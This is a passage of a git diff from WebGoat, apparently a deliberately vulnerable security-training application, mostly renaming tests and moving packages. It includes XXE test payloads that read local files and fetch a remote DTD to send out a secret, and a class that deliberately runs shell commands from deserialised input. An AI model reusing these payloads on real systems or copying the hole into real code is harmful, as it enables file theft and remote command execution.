 
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/4"));
-		driver.findElements(By.name("query")).get(3).sendKeys(SqlInjectionLessonTest.sql_5);
+		driver.findElements(By.name("query")).get(3).sendKeys(SqlInjectionLessonIntegrationTest.sql_5);
 		driver.findElements(By.name("query")).get(3).submit();
 
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/8"));
@@ -103,8 +103,8 @@ public class SeleniumTest extends IntegrationTest {
 		driver.findElement(By.name("Get Account Info")).click();
 
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/9"));
-		driver.findElement(By.name("userid")).sendKeys(SqlInjectionLessonTest.sql_10_userid);
-		driver.findElement(By.name("login_count")).sendKeys(SqlInjectionLessonTest.sql_10_login_count);
+		driver.findElement(By.name("userid")).sendKeys(SqlInjectionLessonIntegrationTest.sql_10_userid);
+		driver.findElement(By.name("login_count")).sendKeys(SqlInjectionLessonIntegrationTest.sql_10_login_count);
 		driver.findElements(By.name("Get Account Info")).get(1).click();
 	}
 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java b/src/it/java/org/owasp/webgoat/SessionManagementIntegrationTest.java
similarity index 96%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
rename to src/it/java/org/owasp/webgoat/SessionManagementIntegrationTest.java
index a716ac98a..ad641212b 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
+++ b/src/it/java/org/owasp/webgoat/SessionManagementIntegrationTest.java
@@ -33,7 +33,7 @@ import org.junit.jupiter.api.Test;
  *
  */
 
-class SessionManagementTest extends IntegrationTest {
+class SessionManagementIT extends IntegrationTest {
     
     private static final String HIJACK_LOGIN_CONTEXT_PATH = "/WebGoat/HijackSession/login";
 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionAdvancedTest.java b/src/it/java/org/owasp/webgoat/SqlInjectionAdvancedIntegrationTest.java
similarity index 96%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionAdvancedTest.java
rename to src/it/java/org/owasp/webgoat/SqlInjectionAdvancedIntegrationTest.java
index 051b89aab..6ae9f838b 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionAdvancedTest.java
+++ b/src/it/java/org/owasp/webgoat/SqlInjectionAdvancedIntegrationTest.java
@@ -5,7 +5,7 @@ import java.util.Map;
 
 import org.junit.jupiter.api.Test;
 
-public class SqlInjectionAdvancedTest extends IntegrationTest {
+public class SqlInjectionAdvancedIntegrationTest extends IntegrationTest {
 
     @Test
     public void runTests() {
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionLessonTest.java b/src/it/java/org/owasp/webgoat/SqlInjectionLessonIntegrationTest.java
similarity index 97%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionLessonTest.java
rename to src/it/java/org/owasp/webgoat/SqlInjectionLessonIntegrationTest.java
index 3aa3cac8b..6c8c446af 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionLessonTest.java
+++ b/src/it/java/org/owasp/webgoat/SqlInjectionLessonIntegrationTest.java
@@ -5,7 +5,7 @@ import java.util.Map;
 
 import org.junit.jupiter.api.Test;
 
-public class SqlInjectionLessonTest extends IntegrationTest {
+public class SqlInjectionLessonIntegrationTest extends IntegrationTest {
 
     public static final String sql_2 = "select department from employees where last_name='Franco'";
     public static final String sql_3 = "update employees set department='Sales' where last_name='Barnett'";
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java b/src/it/java/org/owasp/webgoat/SqlInjectionMitigationIntegrationTest.java
similarity index 94%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java
rename to src/it/java/org/owasp/webgoat/SqlInjectionMitigationIntegrationTest.java
index 8bc13f64b..6d9394674 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java
+++ b/src/it/java/org/owasp/webgoat/SqlInjectionMitigationIntegrationTest.java
@@ -10,7 +10,7 @@ import org.junit.jupiter.api.Test;
 
 import static org.hamcrest.CoreMatchers.containsString;
 
-public class SqlInjectionMitigationTest extends IntegrationTest {
+public class SqlInjectionMitigationIntegrationTest extends IntegrationTest {
 
     @Test
     public void runTests() {
@@ -59,7 +59,7 @@ public class SqlInjectionMitigationTest extends IntegrationTest {
                 .get(url("/WebGoat/SqlInjectionMitigations/servers?column=unknown"))
                 .then()
                 .statusCode(500)
-                .body("trace", containsString("select id, hostname, ip, mac, status, description from servers  where status <> 'out of order' order by"));
+                .body("trace", containsString("select id, hostname, ip, mac, status, description from SERVERS where status <> 'out of order' order by"));
 
         params.clear();
         params.put("ip", "104.130.219.202");
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/WebWolfTest.java b/src/it/java/org/owasp/webgoat/WebWolfIntegrationTest.java
similarity index 93%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/WebWolfTest.java
rename to src/it/java/org/owasp/webgoat/WebWolfIntegrationTest.java
index 6ffbf736a..041f5157f 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/WebWolfTest.java
+++ b/src/it/java/org/owasp/webgoat/WebWolfIntegrationTest.java
@@ -10,7 +10,7 @@ import org.junit.jupiter.api.Test;
 
 import io.restassured.RestAssured;
 
-public class WebWolfTest extends IntegrationTest {
+public class WebWolfIntegrationTest extends IntegrationTest {
     
     @Test
     public void runTests() throws IOException {
@@ -19,7 +19,7 @@ public class WebWolfTest extends IntegrationTest {
         //Assignment 3
         Map<String, Object> params = new HashMap<>();
         params.clear();
-        params.put("email", getWebgoatUser()+"@webgoat.org");
+        params.put("email", this.getUser()+"@webgoat.org");
         checkAssignment(url("/WebGoat/WebWolf/mail/send"), params, false);
         
         String responseBody = RestAssured.given()
@@ -31,7 +31,7 @@ public class WebWolfTest extends IntegrationTest {
                 .extract().response().getBody().asString();
         
         String uniqueCode = responseBody.replace("%20", " ");
-        uniqueCode = uniqueCode.substring(21+uniqueCode.lastIndexOf("your unique code is: "),uniqueCode.lastIndexOf("your unique code is: ")+(21+getWebgoatUser().length()));
+        uniqueCode = uniqueCode.substring(21+uniqueCode.lastIndexOf("your unique code is: "),uniqueCode.lastIndexOf("your unique code is: ")+(21+ this.getUser().length()));
         params.clear();
         params.put("uniqueCode", uniqueCode);
         checkAssignment(url("/WebGoat/WebWolf/mail"), params, true);
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java b/src/it/java/org/owasp/webgoat/XSSIntegrationTest.java
similarity index 98%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java
rename to src/it/java/org/owasp/webgoat/XSSIntegrationTest.java
index 83c35e320..adae15d2c 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java
+++ b/src/it/java/org/owasp/webgoat/XSSIntegrationTest.java
@@ -7,7 +7,7 @@ import java.util.Map;
 
 import org.junit.jupiter.api.Test;
 
-public class XSSTest extends IntegrationTest {
+public class XSSIntegrationTest extends IntegrationTest {
 
     
     @Test
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/src/it/java/org/owasp/webgoat/XXEIntegrationTest.java
similarity index 77%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
rename to src/it/java/org/owasp/webgoat/XXEIntegrationTest.java
index 5e5d3a0fb..e7c2a5497 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/src/it/java/org/owasp/webgoat/XXEIntegrationTest.java
@@ -1,16 +1,15 @@
 package org.owasp.webgoat;
 
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+import org.junit.jupiter.api.Test;
+
 import java.io.IOException;
 import java.nio.file.Files;
 import java.nio.file.Path;
 import java.nio.file.Paths;
 
-import org.junit.jupiter.api.Test;
-
-import io.restassured.RestAssured;
-import io.restassured.http.ContentType;
-
-public class XXETest extends IntegrationTest {
+public class XXEIntegrationTest extends IntegrationTest {
 
     private static final String xxe3 = """
             <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>""";
@@ -22,18 +21,7 @@ public class XXETest extends IntegrationTest {
             <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "WEBWOLFURL/USERNAME/blind.dtd">%remote;]><comment><text>test&send;</text></comment>""";
 
     private String webGoatHomeDirectory;
-    private String webwolfFileDir;
-
-    @Test
-    public void runTests() throws IOException {
-        startLesson("XXE");
-        webGoatHomeDirectory = getWebGoatServerPath();
-        webwolfFileDir = getWebWolfServerPath();
-        checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, true);
-        checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, true);
-        checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", true);
-        checkResults("xxe/");
-    }
+    private String webWolfFileServerLocation;
 
     /*
      * This test is to verify that all is secure when XXE security patch is applied.
@@ -41,8 +29,8 @@ public class XXETest extends IntegrationTest {
     @Test
     public void xxeSecure() throws IOException {
         startLesson("XXE");
-        webGoatHomeDirectory = getWebGoatServerPath();
-        webwolfFileDir = getWebWolfServerPath();
+        webGoatHomeDirectory = webGoatServerDirectory();
+        webWolfFileServerLocation = getWebWolfFileServerLocation();
         RestAssured.given()
                 .when()
                 .relaxedHTTPSValidation()
@@ -54,7 +42,7 @@ public class XXETest extends IntegrationTest {
         checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, false);
         checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", false);
     }
-    
+
     /**
      * This performs the steps of the exercise before the secret can be committed in the final step.
      *
@@ -63,11 +51,11 @@ public class XXETest extends IntegrationTest {
      */
     private String getSecret() throws IOException {
         //remove any left over DTD
-        Path webWolfFilePath = Paths.get(webwolfFileDir);
-        if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(), "blind.dtd")).toFile().exists()) {
-            Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(), "blind.dtd")));
+        Path webWolfFilePath = Paths.get(webWolfFileServerLocation);
+        if (webWolfFilePath.resolve(Paths.get(this.getUser(), "blind.dtd")).toFile().exists()) {
+            Files.delete(webWolfFilePath.resolve(Paths.get(this.getUser(), "blind.dtd")));
         }
-        String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
+        String secretFile = webGoatHomeDirectory.concat("/XXE/" + getUser() + "/secret.txt");
         String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
 
         //upload DTD
@@ -76,12 +64,12 @@ public class XXETest extends IntegrationTest {
                 .relaxedHTTPSValidation()
                 .cookie("WEBWOLFSESSION", getWebWolfCookie())
                 .multiPart("file", "blind.dtd", dtd7String.getBytes())
-                .post(webWolfUrl("/WebWolf/fileupload"))
+                .post(webWolfUrl("/fileupload"))
                 .then()
                 .extract().response().getBody().asString();
         //upload attack
-        String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser());
-        checkAssignment(url("/WebGoat/xxe/blind?send=test"), ContentType.XML, xxe7String, false);
+        String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", this.getUser());
+        checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, xxe7String, false);
 
         //read results from WebWolf
         String result = RestAssured.given()
@@ -93,8 +81,19 @@ public class XXETest extends IntegrationTest {
                 .extract().response().getBody().asString();
         result = result.replace("%20", " ");
         if (-1 != result.lastIndexOf("WebGoat 8.0 rocks... (")) {
-        	result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("), result.lastIndexOf("WebGoat 8.0 rocks... (") + 33);
+            result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("), result.lastIndexOf("WebGoat 8.0 rocks... (") + 33);
         }
         return result;
     }
+
+    @Test
+    public void runTests() throws IOException {
+        startLesson("XXE", true);
+        webGoatHomeDirectory = webGoatServerDirectory();
+        webWolfFileServerLocation = getWebWolfFileServerLocation();
+        checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, true);
+        checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, true);
+        checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", true);
+        checkResults("xxe/");
+    }
 }
diff --git a/webgoat-lessons/insecure-deserialization/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java b/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
similarity index 96%
rename from webgoat-lessons/insecure-deserialization/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
rename to src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
index 00325eb93..3dccbb916 100644
--- a/webgoat-lessons/insecure-deserialization/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
+++ b/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
@@ -1,73 +1,74 @@
-package org.dummy.insecure.framework;
-
-import lombok.extern.slf4j.Slf4j;
-
-import java.io.BufferedReader;
-import java.io.IOException;
-import java.io.InputStreamReader;
-import java.io.ObjectInputStream;
-import java.io.Serializable;
-import java.time.LocalDateTime;
-
-@Slf4j
-public class VulnerableTaskHolder implements Serializable {
-
-	private static final long serialVersionUID = 2;
-
-	private String taskName;
-	private String taskAction;
-	private LocalDateTime requestedExecutionTime;
-	
-	public VulnerableTaskHolder(String taskName, String taskAction) {
-		super();
-		this.taskName = taskName;
-		this.taskAction = taskAction;
-		this.requestedExecutionTime = LocalDateTime.now();
-	}
-	
-	@Override
-	public String toString() {
-		return "VulnerableTaskHolder [taskName=" + taskName + ", taskAction=" + taskAction + ", requestedExecutionTime="
-				+ requestedExecutionTime + "]";
-	}
-
-	/**
-	 * Execute a task when de-serializing a saved or received object.
-	 * @author stupid develop
-	 */
-	private void readObject( ObjectInputStream stream ) throws Exception {
-        //unserialize data so taskName and taskAction are available
-		stream.defaultReadObject();
-		
-		//do something with the data
-		log.info("restoring task: {}", taskName);
-		log.info("restoring time: {}", requestedExecutionTime);
-		
-		if (requestedExecutionTime!=null && 
-				(requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))
-				|| requestedExecutionTime.isAfter(LocalDateTime.now()))) {
-			//do nothing is the time is not within 10 minutes after the object has been created
-			log.debug(this.toString());
-			throw new IllegalArgumentException("outdated");
-		}
-		
-		//condition is here to prevent you from destroying the goat altogether
-		if ((taskAction.startsWith("sleep")||taskAction.startsWith("ping"))
-				&& taskAction.length() < 22) {
-		log.info("about to execute: {}", taskAction);
-		try {
-            Process p = Runtime.getRuntime().exec(taskAction);
-            BufferedReader in = new BufferedReader(
-                                new InputStreamReader(p.getInputStream()));
-            String line = null;
-            while ((line = in.readLine()) != null) {
-                log.info(line);
-            }
-        } catch (IOException e) {
-            log.error("IO Exception", e);
-        }
-		}
-       
-    }
-	
-}
+package org.dummy.insecure.framework;
+
+import lombok.extern.slf4j.Slf4j;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.io.ObjectInputStream;
+import java.io.Serializable;
+import java.time.LocalDateTime;
+
+@Slf4j
+//TODO move back to lesson
+public class VulnerableTaskHolder implements Serializable {
+
+	private static final long serialVersionUID = 2;
+
+	private String taskName;
+	private String taskAction;
+	private LocalDateTime requestedExecutionTime;
+	
+	public VulnerableTaskHolder(String taskName, String taskAction) {
+		super();
+		this.taskName = taskName;
+		this.taskAction = taskAction;
+		this.requestedExecutionTime = LocalDateTime.now();
+	}
+	
+	@Override
+	public String toString() {
+		return "VulnerableTaskHolder [taskName=" + taskName + ", taskAction=" + taskAction + ", requestedExecutionTime="
+				+ requestedExecutionTime + "]";
+	}
+
+	/**
+	 * Execute a task when de-serializing a saved or received object.
+	 * @author stupid develop
+	 */
+	private void readObject( ObjectInputStream stream ) throws Exception {
+        //unserialize data so taskName and taskAction are available
+		stream.defaultReadObject();
+		
+		//do something with the data
+		log.info("restoring task: {}", taskName);
+		log.info("restoring time: {}", requestedExecutionTime);
+		
+		if (requestedExecutionTime!=null && 
+				(requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))
+				|| requestedExecutionTime.isAfter(LocalDateTime.now()))) {
+			//do nothing is the time is not within 10 minutes after the object has been created
+			log.debug(this.toString());
+			throw new IllegalArgumentException("outdated");
+		}
+		
+		//condition is here to prevent you from destroying the goat altogether
+		if ((taskAction.startsWith("sleep")||taskAction.startsWith("ping"))
+				&& taskAction.length() < 22) {
+		log.info("about to execute: {}", taskAction);
+		try {
+            Process p = Runtime.getRuntime().exec(taskAction);
+            BufferedReader in = new BufferedReader(
+                                new InputStreamReader(p.getInputStream()));
+            String line = null;
+            while ((line = in.readLine()) != null) {
+                log.info(line);
+            }
+        } catch (IOException e) {
+            log.error("IO Exception", e);
+        }
+		}
+       
+    }
+	
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/AjaxAuthenticationEntryPoint.java b/src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
similarity index 97%
rename from webgoat-container/src/main/java/org/owasp/webgoat/AjaxAuthenticationEntryPoint.java
rename to src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
index b4d6a0745..67b0cf977 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/AjaxAuthenticationEntryPoint.java
+++ b/src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
@@ -27,7 +27,7 @@
  * for free software projects.
  */
 
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
 import org.springframework.security.core.AuthenticationException;
 import org.springframework.security.web.authentication.LoginUrlAuthenticationEntryPoint;
@@ -48,6 +48,7 @@ public class AjaxAuthenticationEntryPoint extends LoginUrlAuthenticationEntryPoi
         super(loginFormUrl);
     }
 
+    @Override
     public void commence(HttpServletRequest request, HttpServletResponse response, AuthenticationException authException) throws IOException, ServletException {
         if (request.getHeader("x-requested-with") != null) {
             response.sendError(401, authException.getMessage());
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
similarity index 57%
rename from webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
rename to src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
index e31524f09..33e2b16a6 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
+++ b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
@@ -29,13 +29,18 @@
  * @since December 12, 2015
  */
 
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
 import lombok.extern.slf4j.Slf4j;
 import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
-import org.owasp.webgoat.asciidoc.*;
-import org.owasp.webgoat.i18n.Language;
+import org.owasp.webgoat.container.asciidoc.OperatingSystemMacro;
+import org.owasp.webgoat.container.asciidoc.UsernameMacro;
+import org.owasp.webgoat.container.asciidoc.WebGoatTmpDirMacro;
+import org.owasp.webgoat.container.asciidoc.WebGoatVersionMacro;
+import org.owasp.webgoat.container.asciidoc.WebWolfMacro;
+import org.owasp.webgoat.container.asciidoc.WebWolfRootMacro;
+import org.springframework.core.io.ResourceLoader;
 import org.thymeleaf.IEngineConfiguration;
 import org.thymeleaf.templateresolver.FileTemplateResolver;
 import org.thymeleaf.templateresource.ITemplateResource;
@@ -63,55 +68,34 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
 
     private static final Asciidoctor asciidoctor = create();
     private static final String PREFIX = "doc:";
-    private final Language language;
+    private final ResourceLoader resourceLoader;
 
-    public AsciiDoctorTemplateResolver(Language language) {
-        this.language = language;
+    public AsciiDoctorTemplateResolver(ResourceLoader resourceLoader) {
+        this.resourceLoader = resourceLoader;
         setResolvablePatterns(Set.of(PREFIX + "*"));
     }
 
     @Override
     protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
         var templateName = resourceName.substring(PREFIX.length());
-        try (InputStream is = readInputStreamOrFallbackToEnglish(templateName, language)) {
-            if (is == null) {
-                log.warn("Resource name: {} not found, did you add the adoc file?", templateName);
-                return new StringTemplateResource("");
-            } else {
-                JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
-                extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
-                extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
-                extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
-                extensionRegistry.inlineMacro("webGoatTempDir", WebGoatTmpDirMacro.class);
-                extensionRegistry.inlineMacro("operatingSystem", OperatingSystemMacro.class);
-                extensionRegistry.inlineMacro("username", UsernameMacro.class);
 
-                StringWriter writer = new StringWriter();
-                asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
-                return new StringTemplateResource(writer.getBuffer().toString());
-            }
+        try (InputStream is = resourceLoader.getResource("classpath:/" + templateName).getInputStream()) {
+            JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
+            extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+            extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
+            extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
+            extensionRegistry.inlineMacro("webGoatTempDir", WebGoatTmpDirMacro.class);
+            extensionRegistry.inlineMacro("operatingSystem", OperatingSystemMacro.class);
+            extensionRegistry.inlineMacro("username", UsernameMacro.class);
+
+            StringWriter writer = new StringWriter();
+            asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
+            return new StringTemplateResource(writer.getBuffer().toString());
         } catch (IOException e) {
-            //no html yet
-            return new StringTemplateResource("");
+            return new StringTemplateResource("<div>Unable to find documentation for: " + templateName + " </div>");
         }
     }
 
-    /**
-     * The resource name is for example HttpBasics_content1.adoc. This is always located in the following directory:
-     * <code>plugin/HttpBasics/lessonPlans/en/HttpBasics_content1.adoc</code>
-     */
-    private String computeResourceName(String resourceName, String language) {
-        return String.format("lessonPlans/%s/%s", language, resourceName);
-    }
-
-    private InputStream readInputStreamOrFallbackToEnglish(String resourceName, Language language) {
-        InputStream is = Thread.currentThread().getContextClassLoader().getResourceAsStream(computeResourceName(resourceName, language.getLocale().getLanguage()));
-        if (is == null) {
-            is = Thread.currentThread().getContextClassLoader().getResourceAsStream(computeResourceName(resourceName, "en"));
-        }
-        return is;
-    }
-
     private Map<String, Object> createAttributes() {
         Map<String, Object> attributes = new HashMap<>();
         attributes.put("source-highlighter", "coderay");
diff --git a/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java b/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java
new file mode 100644
index 000000000..28559c92a
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java
@@ -0,0 +1,68 @@
+package org.owasp.webgoat.container;
+
+import lombok.RequiredArgsConstructor;
+import lombok.extern.slf4j.Slf4j;
+import org.flywaydb.core.Flyway;
+import org.owasp.webgoat.container.lessons.LessonScanner;
+import org.owasp.webgoat.container.service.RestartLessonService;
+import org.springframework.boot.autoconfigure.jdbc.DataSourceProperties;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.Primary;
+import org.springframework.jdbc.datasource.DriverManagerDataSource;
+
+import javax.sql.DataSource;
+import java.util.Map;
+import java.util.function.Function;
+
+@Configuration
+@RequiredArgsConstructor
+@Slf4j
+public class DatabaseConfiguration {
+
+    private final DataSourceProperties properties;
+    private final LessonScanner lessonScanner;
+
+    @Bean
+    @Primary
+    public DataSource dataSource() {
+        DriverManagerDataSource dataSource = new DriverManagerDataSource();
+        dataSource.setDriverClassName(properties.getDriverClassName());
+        dataSource.setUrl(properties.getUrl());
+        dataSource.setUsername(properties.getUsername());
+        dataSource.setPassword(properties.getPassword());
+        return dataSource;
+    }
+
+    /**
+     * Define 2 Flyway instances, 1 for WebGoat itself which it uses for internal storage like users and 1 for lesson
+     * specific tables we use. This way we clean the data in the lesson database quite easily see {@link RestartLessonService#restartLesson()}
+     * for how we clean the lesson related tables.
+     */
+    @Bean(initMethod = "migrate")
+    public Flyway flyWayContainer() {
+        return Flyway
+                .configure()
+                .configuration(Map.of("driver", properties.getDriverClassName()))
+                .dataSource(dataSource())
+                .schemas("container")
+                .locations("db/container")
+                .load();
+    }
+
+    @Bean
+    public Function<String, Flyway> flywayLessons(LessonDataSource lessonDataSource) {
+        return schema -> Flyway
+                .configure()
+                .configuration(Map.of("driver", properties.getDriverClassName()))
+                .schemas(schema)
+                .dataSource(lessonDataSource)
+                .locations("lessons")
+                .load();
+    }
+
+    @Bean
+    public LessonDataSource lessonDataSource() {
+        return new LessonDataSource(dataSource());
+    }
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java b/src/main/java/org/owasp/webgoat/container/HammerHead.java
similarity index 85%
rename from webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java
rename to src/main/java/org/owasp/webgoat/container/HammerHead.java
index 643e76d1c..b186a1b9f 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java
+++ b/src/main/java/org/owasp/webgoat/container/HammerHead.java
@@ -1,16 +1,12 @@
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webgoat.session.Course;
-import org.springframework.security.core.Authentication;
+import org.owasp.webgoat.container.session.Course;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.servlet.ModelAndView;
 
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-
 /**
  * *************************************************************************************************
  * <p>
@@ -55,7 +51,7 @@ public class HammerHead {
      * Entry point for WebGoat, redirects to the first lesson found within the course.
      */
     @RequestMapping(path = "/attack", method = {RequestMethod.GET, RequestMethod.POST})
-    public ModelAndView attack(Authentication authentication, HttpServletRequest request, HttpServletResponse response) {
+    public ModelAndView attack() {
         return new ModelAndView("redirect:" + "start.mvc" + course.getFirstLesson().getLink());
     }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/LessonDataSource.java b/src/main/java/org/owasp/webgoat/container/LessonDataSource.java
similarity index 94%
rename from webgoat-container/src/main/java/org/owasp/webgoat/LessonDataSource.java
rename to src/main/java/org/owasp/webgoat/container/LessonDataSource.java
index aee378072..e386a67ae 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/LessonDataSource.java
+++ b/src/main/java/org/owasp/webgoat/container/LessonDataSource.java
@@ -1,6 +1,6 @@
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
-import org.owasp.webgoat.lessons.LessonConnectionInvocationHandler;
+import org.owasp.webgoat.container.lessons.LessonConnectionInvocationHandler;
 import org.springframework.jdbc.datasource.ConnectionProxy;
 
 import javax.sql.DataSource;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/LessonTemplateResolver.java b/src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
similarity index 89%
rename from webgoat-container/src/main/java/org/owasp/webgoat/LessonTemplateResolver.java
rename to src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
index 198bee1a3..732deb519 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/LessonTemplateResolver.java
+++ b/src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
@@ -29,8 +29,9 @@
  * @since October 28, 2003
  */
 
-package org.owasp.webgoat;
+package org.owasp.webgoat.container;
 
+import lombok.extern.slf4j.Slf4j;
 import org.springframework.core.io.ResourceLoader;
 import org.thymeleaf.IEngineConfiguration;
 import org.thymeleaf.templateresolver.FileTemplateResolver;
@@ -47,11 +48,12 @@ import java.util.Set;
  * Dynamically resolve a lesson. In the html file this can be invoked as:
  *
  * <code>
- *    <div th:case="true" th:replace="lesson:__${lesson.class.simpleName}__"></div>
+ * <div th:case="true" th:replace="lesson:__${lesson.class.simpleName}__"></div>
  * </code>
- *
+ * <p>
  * Thymeleaf will invoke this resolver based on the prefix and this implementation will resolve the html in the plugins directory
  */
+@Slf4j
 public class LessonTemplateResolver extends FileTemplateResolver {
 
     private static final String PREFIX = "lesson:";
@@ -65,16 +67,16 @@ public class LessonTemplateResolver extends FileTemplateResolver {
 
     @Override
     protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
-        var templateName = resourceName.substring(PREFIX.length());;
+        var templateName = resourceName.substring(PREFIX.length());
         byte[] resource = resources.get(templateName);
         if (resource == null) {
             try {
-                resource = resourceLoader.getResource("classpath:/html/" + templateName + ".html").getInputStream().readAllBytes();
+                resource = resourceLoader.getResource("classpath:/" + templateName).getInputStream().readAllBytes();
             } catch (IOException e) {
-                e.printStackTrace();
+                log.error("Unable to find lesson HTML: {}", template);
             }
-            resources.put(resourceName, resource);
+            resources.put(templateName, resource);
         }
